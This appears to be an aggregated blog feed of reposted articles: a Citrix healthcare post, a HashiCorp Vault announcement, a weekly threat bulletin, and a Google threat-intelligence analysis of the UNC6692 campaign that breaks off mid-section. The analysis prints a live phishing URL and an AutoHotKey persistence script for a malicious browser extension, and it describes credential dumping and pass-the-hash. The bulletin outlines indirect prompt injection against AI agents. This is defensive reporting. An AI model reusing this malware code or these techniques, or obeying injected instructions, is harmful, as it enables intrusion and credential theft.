Posts on Security, Cloud, DevOps, Citrix, VMware and others.
Words and views are my own and do not reflect on my companies views.
Disclaimer: some of the links on this site are affiliate links, if you click on them and make a purchase, I make a commission.
Six months into my role at Citrix, I’ve found myself thinking a lot about where I came from. Not in a nostalgic way, but in a very real, almost day-to-day sense. I spent years as a CIO walking the hospital floor, sitting in rooms where decisions weren’t theoretical. They were decisions that had immediate impact on clinicians, patients, and the people trying to hold everything together behind the scenes. What I didn’t fully expect is how much this role would bring me back into that same energy. Being on-site again, across different health systems, listening more than talking… it’s been grounding. And honestly, it’s been eye-opening in a different way.
What I’m hearing is consistent. Almost to the point where you can finish the sentence of a CIO before they say it.
Health systems are under pressure in ways that feel heavier than even a few years ago. Cost comes up in every conversation, but not in a simple “we need to cut” way. Leaders are trying to make sense of what they already have – what’s redundant, underutilized, or still providing value. There’s a real desire to be smarter about the existing footprint, not just layer on something new. There’s also pressure to do more with less even when the AI train continues to barrel into the doors of hospitals at a faster rate than any other technology I’ve seen.
Security is an assumed topic – every conversation eventually lands there. Not just perimeter security, but what’s happening inside the environment – lateral movement, shadow IT, medical devices that were never really designed to be secured in the first place. There’s an understanding now that it’s not a matter of if something happens, but when, and how prepared you are when it does.
Resiliency comes up right alongside that. And not just uptime in the traditional sense. I’m hearing more about operational continuity and what happens to care delivery when systems are unavailable, even for a short period of time. The tolerance for disruption is basically gone.
Then there’s M&A. It’s moving fast – sometimes faster than the organizations themselves would prefer. Integration strategies are being built while planes are still in the air. IT teams are expected to connect environments quickly, securely, and without adding cost (which is easier said than done).
Layer in governance challenges and increasing regulatory expectations, and you start to see the weight of it all. But the conversations always come back to people. Clinician burnout is still very real. And hovering over all of this is the “Silver Tsunami.” Experienced staff – people who know how these environments actually work – are retiring, and there’s real concern about the knowledge that gets lost when they leave.
What’s interesting is that despite all of this, I don’t hear people asking for more vendors. In fact, it’s usually the opposite. What they’re asking for, in a much more direct way than I remember, is partnership. Not on a slide, not in a contract – in how the work actually gets done.
Coming into this role, I had my own perspective on what that meant from the outside. Six months in, I’ve had the chance to see how teams at Citrix actually show up. And I’ll say this: it’s less about having the perfect answer and more about being willing to sit in the problem with the customer and work through it.
For example, the discussion isn’t just about protecting the edge anymore. It’s about how you reduce risk inside the environment and how you segment that environment in a way that actually reflects how healthcare operates. I’ve watched teams map out approaches that address both macro and micro segmentation, tying together infrastructure and application layers in a way that helps limit lateral movement and better protect things like medical devices and research environments. It’s not theoretical. It’s grounded in what customers are actually dealing with and opening doors to what’s possible – all while reducing the need for sneakernet.
I’ve also been part of situations where things had already gone wrong, such organizations recovering from cyber events and trying to get systems back online while managing the clinical impact in real time. In one case, we helped bring an environment back in about two days. That matters. But what stayed with me more was how much faster that recovery could have been if we had been involved earlier. That’s something I’ve been thinking about a lot—how different the outcome can be when you’re part of the conversation before the crisis. What I’ve learned is that Citrix is a great partner when the team is in the room as decisions are getting made. There’s a lot to consider when it comes to shifting disaster recovery to business resiliency, and modern IT strategy is everything.
It’s no surprise that cost continues to be a thread throughout all the conversations I’m having. But again, it’s not just about reduction. It’s about clarity and allocation. I’ve seen how tools like Citrix uberAgent can help organizations get a better understanding of how applications and user personas are actually being used ahead of major changes or decisions. That data-driven visibility can lead to more thoughtful conversations and decisions around application rationalization, which is a massive spend category in IT budgets. Overall, financial flexibility is going to be a key component of how IT budgets adapt in the years to come. Cloud migration caused a lot of disruption in the name of flexibility in the past.
As we go forward, financial agility will need to also provide financial stability, and how that happens across your workforce and the people engaging with your technology everyday will become more closely aligned. Citrix recognizes the need to enhance user and financial agility without adding unnecessary complexity and will soon provide a new way to address ongoing challenges. Register here to learn more.
Some of the most practical ways that Citrix adds value that I’ve seen are the smaller ones. The things that don’t always make headlines but make a real difference day-to-day. Using session recording and monitoring capabilities to troubleshoot issues in real time, reducing the back-and-forth between support teams and clinicians. It’s simple, but when teams are stretched thin, those gains matter.
If I step back and think about what’s changed for me personally over these last six months, it’s probably that my definition of partnership has gotten more specific. It’s less about what we say and more about when and how we show up. Are we there early enough to help shape the path, or are we being brought in after decisions have already been made? Are we simplifying things, or adding another layer of complexity?
No CIO should be navigating the current healthcare IT landscape without bringing along a few trusted advisors. That said, I don’t think any of us have this completely figured out. The environment is too dynamic for that. But I do believe there’s an opportunity for me to do things differently than what’s been done before for our healthcare customers. And that is to be more connected to what customers are actually experiencing and to respond in a way that reflects that.
Walking the floors again, even in a different role, has reminded me of something I probably already knew but needed to see again. Healthcare doesn’t need more noise. It needs people who understand what’s at stake and are willing to do the work alongside the teams carrying that responsibility every day.
Six months in, I’m still learning. But I’m encouraged by what I’ve seen so far—and even more by what I think is possible if we keep leaning in the right way.
from Citrix Blogs https://ift.tt/QcUPBn1
via IFTTT
In modern enterprises, security is only as strong as its weakest link. For most organizations, that link is often the manual, fragmented process of managing X.509 certificates. While HashiCorp Vault (now IBM Vault) has long been the gold standard for automating internal PKI (private key infrastructure), a significant hurdle remained: the "public trust" boundary.
Today, we are excited to announce a major expansion of Vault Enterprise’s PKI capabilities. You can now integrate and orchestrate public certificate authorities (CAs) directly within Vault, providing a single, automated workflow for every certificate your organization needs — whether it’s for an internal microservice or a customer-facing website.
The pain of fragmented certificate management
Many organizations have successfully automated their internal workflows using Vault’s private PKI. However, when a service requires a certificate trusted by external browsers or public networks, the automation stops. This creates a "dual-track" management problem that introduces several critical pain points:
• Operational overhead: Without native public CA integration, teams must step outside their automated pipelines to manually request, renew, and revoke certificates via external CA portals. This human intervention is the primary cause of errors and missed renewals.
• The "outage clock": Every manual certificate is a ticking clock. Fragmented management means you lack a central view of expiration dates across different providers, leading to unexpected downtime when a public-facing API or website certificate expires.
• Siloed governance: Organizations are forced to split governance between one tool for private certs and another for public certs. This inconsistency makes it nearly impossible to enforce unified security policies or maintain a complete audit trail for compliance standards like NIST, PCI DSS, or SOC2.
• Limited external utility: Private CAs are excellent for internal trust, but they don't work for customer-facing services. Relying on separate tools for public trust limits Vault’s utility in hybrid and multi-cloud scenarios where external trust is a hard requirement.
A single pane of glass for PKI
Enterprises are looking for a way to centralize the entire certificate lifecycle. Our new public CA integration does exactly that. By acting as a central proxy, Vault now securely manages upstream CA credentials and orchestrates the complex validation challenges required for public issuance.
This feature allows your development teams to request publicly trusted certificates using the same Vault APIs and workflows they already use for private ones. The result? A centralized, automated approach that removes manual silos and provides a unified "single pane of glass" view of your organization's entire certificate footprint.
How it works: Orchestrating public trust
This new integration leverages the ACME (Automated Certificate Management Environment) protocol to provide a vendor-agnostic interface for public CA orchestration.
Native integration with leading CAs
Vault now supports native integration with the most prominent public certificate authorities, allowing you to centralize credentials and automate workflows for:
● Let’s Encrypt
● DigiCert
● GlobalSign (beta)
● Sectigo (beta)
Orchestration via Vault agent
The Vault agent has been updated to act as the primary orchestrator. It manages communication between Vault and the public CA, handling the heavy lifting of domain validation.
In this initial release, we are implementing support for the HTTP-01 challenge. This means Vault can automate the process of proving domain ownership by serving a specific token over HTTP. For teams managing diverse infrastructures, we are also working to add DNS-01 challenge support in the very near future to handle wildcard certificates and non-web-accessible environments.
Streamlined workflows
The integration supports both secure CSR-based workflows (where the private key never leaves your infrastructure) and flexible identifier-based workflows for rapid issuance.
What you can do today
With this new feature, your security and platform teams can perform the following tasks directly within the Vault ecosystem:
● Set up integrations: Easily configure secure connections with your desired public CA using native Vault configuration.
● Request and download: Dev teams can request public certificates via the Vault API, CLI, or UI and download them immediately upon issuance.
● Manual renewal: Maintain control by manually triggering renewals for public certificates through the Vault interface.
● Revocation: Instantly revoke public certificates created via Vault if a compromise is suspected, ensuring your external security posture is always up to date.
● Leverage the Terraform Vault provider: Fully automate the setup and management of these public CA integrations using the updated Terraform Vault provider.
Conclusion: Taking control of the lifecycle
The goal of Vault Enterprise has always been to simplify the complex. By bringing public CA management into the Vault ecosystem, we are eliminating the manual friction that has long plagued security teams. You no longer have to choose between automation and public trust —with Vault, you can have both.
Whether you are a technical decision-maker looking to reduce the risk of outages or a practitioner aiming to automate manual portal logins, this new integration provides the tools you need for a truly modern, end-to-end PKI strategy.
You scroll past one incident and see another that feels familiar, like it should have been fixed years ago, but it still works with small changes. Same bugs. Same mistakes.
The supply chain is messy. Packages you did not check are stealing data, adding backdoors, and spreading. Attacking the systems behind apps is easier than breaking the apps themselves. The exploits are simple but still work, giving attackers easy access.
AI tools are also part of the problem now. They trust bad input and take real actions, which makes the damage bigger. Then there are quieter issues. Apps take data they should not. Devices behave in strange ways. Attackers keep testing what they can get away with. No noise. Just ongoing damage.
Here is the list for this week’s ThreatsDay Bulletin.
Inter-blockchain communication protocol LayerZero has revealed that North Korean threat actors tracked TraderTraitor may have been behind the recent hack of decentralized finance (DeFi) project KelpDAO, resulting in the theft of $290 million. "The attack was specifically engineered to manipulate or poison downstream RPC infrastructure by compromising a quorum of the RPCs the LayerZero Labs DVN relied upon to verify transactions," LayerZero said. KelpDAO, in a post on X, said, "Two RPC nodes hosted by LayerZero were compromised. A simultaneous DDoS attack was launched against the third RPC node. This was an attack on LayerZero's infrastructure. Kelp's own systems were not involved in building or operating that infrastructure." Meanwhile, the Arbitrum Security Council has temporarily frozen the 30,766 ETH being held in the address on Arbitrum One that is connected to the KelpDAO exploit. It's worth noting that TraderTraiter was attributed to the mega Bybit hack in early 2025 that led to the theft of $1.5 billion in digital assets. Recently, Lazarus Group was also linked to the $285 million theft from the Drift Protocol.
Separately, VulnCheck has warned of attacks attempting to exploit two flaws in MajorDoMo, a smart home automation platform. While CVE-2026-27175 is a critical command injection vulnerability that started seeing exploitation on April 13, CVE-2026-27174 allows unauthenticated remote code execution via the PHP console in the admin panel and was first detected on April 18. "CVE-2026-27175 was exploited to drop a PHP webshell that delivers persistent backdoor access," VulnCheck said. "CVE-2026-27174 saw exploitation that ended in a Metasploit php/meterpreter/reverse_tcp staged payload." Other vulnerabilities that have witnessed exploitation efforts include CVE-2025-22952, an SSRF in Elestio Memos, and CVE-2024-57046, an authentication bypass in NETGEAR DGN2200 routers.
A number of malicious packages have been discovered in the npm registry: ixpresso-core, forge-jsx, @genoma-ui/components, @needl-ai/common, rrweb-v1, cjs-biginteger, sjs-biginteger, bjs-biginteger, @fairwords/websocket, @fairwords/loopback-connector-es, @fairwords/encryption, js-logger-pack, and @kindo/selfbot. These packages come with features to steal sensitive data from compromised hosts, perform system reconnaissance, andimplant an SSH backdoor by injecting the attacker's public key into ~/.ssh/authorized_keys, deliver an information stealer, and spread the XWorm remote access trojan (RAT). The packages published under the "@fairwords" scope have also been found to self-propagate to all npm packages using the victim's token and attempt cross-ecosystem propagation to PyPI via .pth file injection. New versions of js-logger-pack have since been found to leverage the Hugging Face repository to poll for updates and use it as a data-theft destination. Also detected was the compromise of @velora-dex/sdk (version 9.4.1) to decode and execute a Base64 payload that fetches a shell script from a remote server that, in turn, downloads and persists a Go-based remote access trojan called minirat on macOS systems. Another legitimate package to be compromised was mgc (versions 1.2.1 through 1.2.4), which was injected with a dropper that detects the operating system and fetches a platform-specific RAT from a GitHub Gist to exfiltrate valuable data.
Forcepoint has detected 10 new indirect prompt injection (IPI) payloads targeting artificial intelligence (AI) agents with malicious instructions designed to achieve financial fraud, data destruction, API key theft, and AI denial-of-service attacks. "Regardless of the specific payload technique or attacker intent, every case follows the same fundamental sequence: the attacker poisons web content, hides the payload from human view, waits for an AI agent to ingest the page, exploits the LLM's inability to distinguish trusted instructions from attacker-controlled content, and triggers a real-world action with a covert exfiltration return channel back to the attacker," the company said.
The Claude desktop app has been found granting itself permission to access web browser data, even if some browsers haven't even been installed on a user's computer, web privacy expert Alexander Hanff said. The app has been spotted placing configuration files in preset locations for Chromium-based browsers like Brave, Google Chrome, Microsoft Edge, and Vivaldi. The Native Messaging manifest files pre-authorize Claude to interact with the browser even before the user installs it. The issue has been described as a case of dark pattern that violates privacy laws in the E.U.
The U.K. National Cyber Security Centre (NCSC) has unveiled a new technology called SilentGlass that's designed to protect video connections from cyber attacks. "SilentGlass, a plug-and-play device, actively blocks anything unexpected or malicious between HDMI and Display Port connections and screens," NCSC said. "Already successfully deployed on Government estates, SilentGlass is now available for anyone to buy and use. It has been approved for use in the most high-threat environments."
In a related development, the NCSC also endorsed passkeys as the default authentication standard and the "first choice of login" for access to all digital services. "Passkeys are a newer method for logging into online accounts, which do much of the heavy lifting for users, only requiring user approval rather than needing to input a password," NCSC said. "This makes passkeys quicker and easier to use and harder for cyber attackers to compromise." It also said the majority of cyber harms to individuals begin with criminals stealing or compromising login details, which makes passkey adoption a "huge leap" in boosting resilience to phishing attacks. More than 50% of active Google services users in the U.K. are said to be already using passkeys.
Reports from Iranian media have claimed that hardware made by Cisco, Juniper, Fortinet, and MikroTik either rebooted or disconnected during recent attacks on Iran, despite the country being cut off from the global internet. "The most striking and suspicious aspect of this incident is its precise timing and the lack of access to the international internet at that moment," Iranian news website Entekhab said. "This disruption occurred at a time when international gateways were effectively blocked or inaccessible; therefore, attributing this chain collapse to 'a simple cyber attack from beyond the borders' is not only unconvincing but also reveals the traces of deep-seated sabotage embedded within the equipment." The report hypothesizes the presence of hidden firmware backdoors or rogue implants within compromised devices, creating a dormant botnet that's activated when a certain event occurs without the need for internet access. The other possibility is a supply chain compromise. "If the chips or installation files of Cisco and Juniper products are compromised before entering the country, even replacing the operating system will not solve the problem, because the root of the problem is embedded in the hardware and read-only memory (ROM)," the report said. These arguments have found purchase in China, whose state media agency Xinhua called U.S.-made equipment the "real trojan horse." The disclosure comes as DomainTools revealed that the various hacktivist personas adopted by Iran, such as Homeland Justice, Karma, and Handala, "constitute a coordinated, MOIS-aligned cyber influence ecosystem operating under multiple branded identities that serve distinct but complementary operational roles."
The Krybit ransomware group has hacked the website of rival ransom group 0APT after the latter threatened to dox Krybit's members. According to security firm Barricade, 0APT leaked the complete database of the Krybit ransomware operation, including victim records, plaintext credentials, Bitcoin wallets, encryption tokens, and a 56MB exfiltration file inventory. In return, Krybit has hit back by compromising 0APT's server within 48 hours, defacing their data leak site, and publishing source code, bash history, Nginx logs, and system files. To rub salt into the wound, the group listed 0APT as victim #1 on their own leak site.
There is a new cryptor-as-a-service platform called FUD Crypt (fudcrypt[.]net). "For $800 to $2,000 per month, subscribers upload an arbitrary Windows executable and receive a multi-stage deployment package that attempts automatic DLL sideloading, in-memory AMSI and ETW interference, silent UAC elevation via CMSTPLUA, and Windows Defender tamper via Group Policy on Enterprise builds," Ctrl-Alt-Intel said.
Two different phishing campaigns targeting Greek, Spanish, Slovenian, Bosnian, Latin, and Central American companies are using different techniques to deliver Formbook malware. "FormBook is a data-stealing malware that targets Windows systems, primarily distributed through phishing emails with malicious attachments," WatchGuard said. “It collects sensitive information like login credentials, browser data, and screenshots, using advanced evasion techniques to avoid detection.”
A highly sophisticated, multi-stage post-exploitation framework has been observed targeting organizations in the Middle East and EMEA financial sectors. "The threat actor leverages a legitimate, digitally signed Intel utility (IAStorHelp.exe) by abusing the .NET AppDomainManager mechanism, effectively turning a trusted binary into a stealthy execution container," CYFIRMA said. "This approach allows malicious code to be executed within a trusted environment. It bypasses conventional security controls without modifying the original signed binary." Because AppDomainManager hijacking enables stealth execution within a trusted signed binary, it allows malicious code to run without modifying the original executable, effectively bypassing code-signing trust controls. The attack begins with a phishing email containing a ZIP archive, which contains an LNK file masquerading as a PDF document to execute "IAStorHelp.exe." It's currently not known who is behind the campaign, but the level of sophistication, modular design, and operational discipline suggest capabilities consistent with advanced threat actors.
A new malware campaign is spreading both a remote access trojan and adware together, allowing attackers to establish persistent access and make financial profits. The attack has been found to leverage a loader to deliver Gh0st RATtrojan and CloverPlus adware, an unwanted software designed to install advertising components and change browser behavior, such as startup pages and pop-up ads, per Splunk.
In a new analysis, Cisco Talos revealed that bad actors can bypass security controls in Apple macOS by repurposing native features like Remote Application Scripting (RAS) for remote execution and abusing Spotlight metadata (Finder comments) to stage payloads in a way that evades static file analysis. "Because Finder is scriptable over RAE, the comment of a file on a remote machine can be set via the “eppc://” protocol. By Base64 encoding a payload locally, a multi-line script can be stored within this single string field. The make new file command handles the creation of the target file, ensuring that no pre-existing file is required," Talos said. "The payload resides entirely within the Spotlight metadata, a location that remains largely unexamined by standard endpoint detection and response (EDR) solutions. This creates a stealthy staging area where malicious code can persist on the disk without triggering alerts associated with suspicious file contents." In addition, attackers can move toolkits and establish persistence using built-in protocols such as SMB, Netcat, Git, TFTP, and SNMP operating entirely outside the visibility of standard SSH-based telemetry. In some cases, adversaries can also bypass built-in restrictions by using Terminal as a proxy for execution, encoding payloads in Base64 and deploying them in stages.
A group of academics has released a hackable, modular, and configurable open-source framework called Terrarium for studying and evaluating decentralized LLM-based multi-agent systems (MAS). "As the capabilities of agents progress (e.g., tool calling) and their state space expands (e.g., the internet), multi-agent systems will naturally arise in unique and unexpected scenarios," the researchers said, adding it acts as "an isolated playground for studying agent behavior, vulnerabilities, and safety. It enables full customization of the communication protocol, communication proxy, environment, tool usage, and agents."
According to Reuters, AI company Clarifai said it has deleted 3 million profile photos taken from dating site OkCupid in 2014. It follows a settlement reached last month between the U.S. Federal Trade Commission (FTC) and Match Group, OkCupid's owner. Clarifai is said to have certified the data deletion to the FTC on April 7, 2026, and deleted any models that trained on the data. The company also emphasized that it hadn't shared the data with third parties. The FTC opened the investigation in 2019, after The New York Times reported that Clarifai had built a training database using OkCupid dating profile photos. The behavior was a direct violation of OkCupid's privacy policy, although Clarifai was not accused of wrongdoing.
VulnCheck said it's seeing active exploitation of the Apache ActiveMQ Jolokia remote code execution chain that strings together CVE-2026-34197 and CVE-2024-32114. "CVE-2024-32114 removes authentication from the Jolokia endpoint entirely on ActiveMQ versions 6.0.0 through 6.1.1," VulnCheck's Jacob Baines said. "Combined with CVE-2026-34197, that is zero-credential RCE."
There has been a surge in phishing emails utilizing empty subject lines as a way to lure users to actually click and open the email without the usual warning cues. Known as silent subject or null subject phishing, the technique is designed to exploit blind spots in email defenses, as it allows such emails to bypass security filters that rely on analyzing the subject lines for specific keywords that may indicate potential phishing or scam. "Emails with empty subject lines evade user suspicion by exploiting human curiosity," CyberProof said. "The primary objective of a silent subject campaign is to gain initial access through social engineering, leading to credential compromise, unauthorized access, and potential lateral movement within targeted environments, especially focusing on high-value or VIP users."
A Belarus-based turnkey solution is assisting SIM farm operators in supporting cybercrime on an industrial scale. Infrawatch said that it identified 87 instances of ProxySmart control panels in 17 countries that are linked to at least 24 commercial proxy providers and 35 cellular providers. The footprint spans 94 phone farm locations, distributed across 19 U.S. states, as well as countries in Europe and South America. ProxySmart provides an end-to-end platform for operating and monetizing mobile proxy infrastructure, including farm management, device control, customer provisioning, retail proxy sales, and payment handling. It's accessible via a web-based control panel that's self-hosted by the farm operator. Devices in the farms are either physical Android phones or USB 4G/5G modems. The phones are enrolled via an unsigned Android APK package downloaded from the ProxySmart website, with SMS send and receive capability included. Modems are managed through ModemManager, an open-source USB dongle management tool. The ProxySmart service is written in Python and obfuscated using PyArmour. "ProxySmart is publicly associated with a Belarus-based vendor footprint and offers an end-to-end stack for operating and monetizing a physical farm, including device management, automated IP rotation, customer provisioning, plan enforcement, and anti-bot countermeasures," the company said. "Technical analysis indicates operator capabilities consistent with large-scale evasion enablement, including automated IP rotation, remote device control, and network fingerprint spoofing." SIM farms enable a range of cybercrime activity such as smishing, premium-rate number fraud, bot sign-ups, and one-time password interception. In response to the findings, ProxySmart disputed its characterization as a SIM farm, stating it's a "data-path proxy management platform" and that its mobile proxy infrastructure "underpins a wide range of legitimate commercial and research activity" including advertising verification, brand protection, price monitoring, and anti-fraud model training, among others.
Ofcom, the U.K.'s independent communications regulator, has launched an investigation into Telegram under the country's Online Safety Act to examine whether the platform is being used to share child sexual abuse material (CSAM) and is doing enough to combat the threat. "We received evidence from the Canadian Centre for Child Protection regarding the alleged presence and sharing of child sexual abuse material on Telegram, and carried out our own assessment of the platform," Ofcom said. "In light of this, we have decided to open an investigation to examine whether Telegram has failed, or is failing, to comply with its duties in relation to illegal content." In a statement shared with The Record, Telegram said it "categorically denies Ofcom's accusations," adding it has "virtually eliminated the public spread of CSAM on its platform through world-class detection algorithms and cooperation with NGOs." Earlier this year, Ofcom also commenced a probe into X to determine whether the service is taking necessary steps to take down illegal content, including non-consensual intimate images and CSAM.
The European Union imposed sanctions on two pro-Russian organizations accused of spreading disinformation and supporting the Kremlin's hybrid influence operations against Europe and Ukraine. The measures target Euromore and the Foundation for the Support and Protection of the Rights of Compatriots Living Abroad (Pravfond). The move is part of the E.U.'s broader effort to counter Russian information and influence operations targeting Europe since the start of Moscow's full-scale invasion of Ukraine in 2022. The E.U. has imposed sanctions on 69 individuals and 19 entities linked to Russian hybrid warfare.
Ukrainian authorities have dismantled a bot farm that's alleged to have supplied thousands of fake social media accounts to Russian intelligence services for use in disinformation campaigns against Ukraine. The suspected organizer of the network has been detained in the northern city of Zhytomyr, and nearly 20,000 fraudulent online profiles that were used in information operations have been blocked. The suspect is believed to have sold more than 3,000 fake Telegram accounts each month to Russian clients. The accounts were created using Ukrainian mobile phone numbers and then advertised on online platforms used by pro-Russian actors. If convicted, the suspect faces up to six years in prison.
More than 130,000 users have downloaded and installed malicious Chrome and Edge extensions that, while offering the promised functionality, also implement covert tracking, remote configuration capabilities, and data collection mechanisms.The 12 extensions posed as tools to download TikTok videos and were available through the official Chrome and Edge stores. The activity has been codenamed StealTok. The extensions have been found to use remote configuration to bypass store review. "Beyond privacy concerns, the use of remote configuration endpoints introduces a significant security risk, enabling post-installation behavior changes that bypass marketplace review mechanisms," LayerX said.
In a new campaign spotted by Sucuri, threat actors are planting a new PHP-based backdoor on Joomla sites to inject SEO spam. The injected script acts as a remote loader to send information about the infected website and awaits further instructions from an attacker-controlled server. "Attackers inject malicious code that silently serves spam content to visitors and search engines, all without the site owner knowing," Sucuri said. "The goal is simple: abuse the site's reputation to push traffic towards products the attacker wants to promote."
A new service called Leak Bazaar has been promoted on the Russian-speaking TierOne forum that claims to process data stolen from extortion and ransomware attacks and turn it into "something more legible, more selective and precise, and making it marketable for the general population to ingest." It's advertised by a user named Snow, who joined the forum on March 3, 2026. "What Leak Bazaar is really offering is not a DLS or Data or Dedicated Leak Site in the conventional sense, but a post-exfiltration service layer," Flare said. "It is trying to reassure both suppliers and buyers that the platform can solve the most frustrating part of data theft, which is that a large percentage of exfiltrated material is too noisy, too unstructured, or too cumbersome to use without additional labor."
GreyNoise has disclosed that a small cluster of 21 IP addresses is now responsible for generating nearly half of all the RDP scanning traffic on the public internet. The addresses are registered to ColocaTel (AS213438), a company based in the Seychelles. According to the threat intelligence firm, mass internet scanning activity is now preceding vendor vulnerability disclosures more frequently than before, with 49% of surges arriving within 10 days of disclosure and 78% within 21 days.In a related development, security researcher Morgan Robertson revealed that almost three-quarters of Perforce P4 source code management servers connected to the internet are misconfigured and leaking source code and sensitive files. "The default Perforce settings allow unauthenticated users to create accounts, list existing users, access passwordless accounts, and, until version 2025.1, allowed syncing repositories remotely; potentially exposing intellectual property across more than a dozen sectors, including gaming, healthcare, automotive, finance, and government," Robertson said. "Action is recommended for all Perforce administrators to ensure security hardening, including setting stronger authentication requirements, disabling automatic account creation, and raising security levels."
None of this is new. That is the problem. Old paths still open, basic checks still skipped, and trust still given where it should not be. Attackers are not doing anything magical, they are just faster and less careful because they do not need to be.
The fixes are known but ignored. Patch early, check what you install, limit access, and stop trusting inputs by default. Most of the damage comes from things that were easy to prevent. Same story next week.
from The Hacker News https://ift.tt/tfSur7W
via IFTTT
Written by: JP Glab, Tufail Ahmed, Josh Kelley, Muhammad Umair
Introduction
Google Threat Intelligence Group (GTIG) identified a multistage intrusion campaign by a newly tracked threat group, UNC6692, that leveraged persistent social engineering, a custom modular malware suite, and deft pivoting inside the victim’s environment to achieve deep network penetration.
As with many other intrusions in recent years, UNC6692 relied heavily on impersonating IT helpdesk employees, convincing their victim to accept a Microsoft Teams chat invitation from an account outside their organization. The UNC6692 campaign demonstrates an interesting evolution in tactics, particularly the use of social engineering, custom malware, and a malicious browser extension, playing on the victim’s inherent trust in several different enterprise software providers.
Threat Details
In late December 2025, UNC6692 conducted a large email campaign designed to overwhelm the target with messages, creating a sense of urgency and distraction. Following this, the attacker sent a phishing message via Microsoft Teams, posing as helpdesk personnel offering assistance with the email volume.
Infection Chain
The victim was contacted through Microsoft Teams and was prompted to click a link to install a local patch that prevents email spamming. Once clicked, the user’s browser opened an HTML page and ultimately downloaded a renamed AutoHotKey binary and an AutoHotkey script, sharing the same name, from a threat actor-controlled AWS S3 bucket.
"url": "https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.com",
"description": "Microsoft Spam Filter Updates | Install the local patch to protect your account from email spamming",
Figure 1: Snippet from MS Team Logs
If the AutoHotkey binary is named the same as a script file in its current directory, AutoHotkey will automatically run the script with no additional command line arguments. Evidence of AutoHotKey execution was recorded immediately following the downloads resulting in initial reconnaissance commands and the installation of SNOWBELT, a malicious Chromium browser extension (not distributed through the Chrome Web Store). Mandiant was unable to recover the initial AutoHotKey script.
The persistence of SNOWBELT was established in multiple ways. First, a shortcut to an AutoHotKey script was added to the Windows Startup folder, which verified SNOWBELT was running and that a Scheduled Task was present.
if !CheckHeadlessEdge(){
try{
taskService:=ComObject("Schedule.Service")
taskService.Connect()
rootFolder:=taskService.GetFolder("\")
if FindAndRunTask(rootFolder){
Sleep 10000
if CheckHeadlessEdge(){
ExitApp
}
}
}
Run 'cmd /c start "" "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\System Data" --headless=new --load-extension="%LOCALAPPDATA%\Microsoft\Edge\Extension Data\SysEvents" --no-first-run',,"Hide"
}
ExitApp
Figure2: Snippet from AutoHotKey script to verify SNOWBELT was running and to start it if not
Second, two additional scheduled tasks were installed. One task to start a windowless Microsoft Edge process that loads the SNOWBELT extension and another to identify and terminate Microsoft Edge processes that do not have CoreUIComponents.dll loaded.
Figure3: Snippet from the scheduled task to start the SNOWBELT extension windowless Microsoft Edge
Microsoft Edge processes without CoreUIComponents.dll are typically headless. The threat actor uses this command to essentially “clean up” headless Edge processes that execute their malware.
Figure 4: Snippet from the scheduled task to check for CoreUIComponents.dll
Using the SNOWBELT extension, UNC6692 downloaded additional files including SNOWGLAZE, SNOWBASIN, AutoHotkey scripts, and a ZIP archive containing a portable Python executable and required libraries.
Internal Recon and Lateral Movement
After gaining initial access, process execution telemetry recorded UNC6692 using a Python script to scan the local network for ports 135, 445, and 3389. Following internal port scanning, the threat actor established a Sysinternals PsExec session to the victims system via the SNOWGLAZE tunnel, and executed commands to enumerate local administrator accounts. Using the local administrator account, the threat actor initiated an RDP session via the SNOWGLAZE tunnel from the victim system to a backup server. Though not directly observed, the threat actor may have acquired the local administrator accounts credentials via multiple attack paths such as authenticated Server Message Block (SMB) share enumeration.
Escalate Privileges
After gaining access to the backup server the threat actor utilized the local administrator account to extract the system's LSASS process memory with Windows Task Manager. Microsoft Windows Local Security Authority Subsystem Service (LSASS) processlsass.exeenforces security policy and contains usernames, passwords and hashes for accounts that have accessed the system. After extracting the process memory, UNC6692 exfiltrated it via LimeWire. With the process memory out of the victim environment UNC6692 is able to use offensive security tools to extract the credentials while not having to worry about being detected.
Complete Mission
Now armed with the password hashes of elevated users, UNC6692 used Pass-The-Hash to move laterally to the network's domain controllers. Pass-The-Hash is a common technique used by threat actors where the NTLM hash is passed to another system, instead of providing the account password, allowing for authentication via NTLM. Once authenticated to the Domain Controller, the threat actor opened Microsoft Edge, and downloaded a ZIP archive containing FTK Imager to the Domain Administrator’s\Downloadsfolder. The threat actor executed FTK Imager and mounted the local storage drive. Subsequently, FTK Imager wrote the Active Directory database file (NTDS.dit), Security Account Manager (SAM) , SYSTEM, and SECURITY registry hives to the\Downloadsfolder. The extracted files were then exfiltrated from the network via LimeWire. Finally, EDR telemetry logged the threat actor performing screen captures on the Domain Controllers, specifically targeting in-focus instances of Microsoft Edge and FTK Imager.
Figure 5: UNC6692 attack lifecycle
THE SNOW Ecosystem
Phishing Landing Page
The original phishing link (https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.com) delivered via Microsoft Teams directs the victim to a landing page masquerading as a "Mailbox Repair Utility." This interface is designed to elicit user engagement through various on-screen buttons.
Figure 6: The landing page masquerading as an official "Mailbox Repair and Sync Utility v2.1.5."
Phase 1: Environment Enforcement and Anti-Analysis
The attacker used a gatekeeper script designed to ensure the payload is delivered only to intended targets while evading automated security sandboxes. Upon loading, the landing page executes aninit()function that inspects the URL for a mandatory?email=parameter. If this parameter is absent, the page immediately redirects toabout:blank.
The script also checks the victim’s browser. If the user is not using Microsoft Edge, the page displays a persistent overlay warning. This forces the user to click an "Open in Edge" button, which triggers themicrosoft-edge:URI scheme. This ensures the victim is moved from potentially secure mobile or third-party browser environments into a specific workspace where the attacker’s exploits are most effective.
Phase 2: Credential Harvesting via Social Engineering
Once the environment is established, the page presents a professional-looking "Configuration Management Panel" masquerading as an official "Mailbox Repair and Sync Utility." The primary hook is a "Health Check" button that, when clicked, triggers an "Authentication Required" modal.
The harvesting script, handleAuthFormSubmit, employs a "double-entry" psychological trick. It is programmed to reject the first and second password attempt as incorrect. This serves two functions: it reinforces the user’s belief that the system is legitimate and performs real-time validation, and it ensures that the attacker captures the password twice, significantly reducing the risk of a typo in the stolen data. A screenshot of authentication is shown in Figure 7, and the email supplied is entered by default.
Figure 7: The credential harvesting prompt triggered by the "Health Check" button
Phase 3: Data Exfiltration and Distraction Sequences
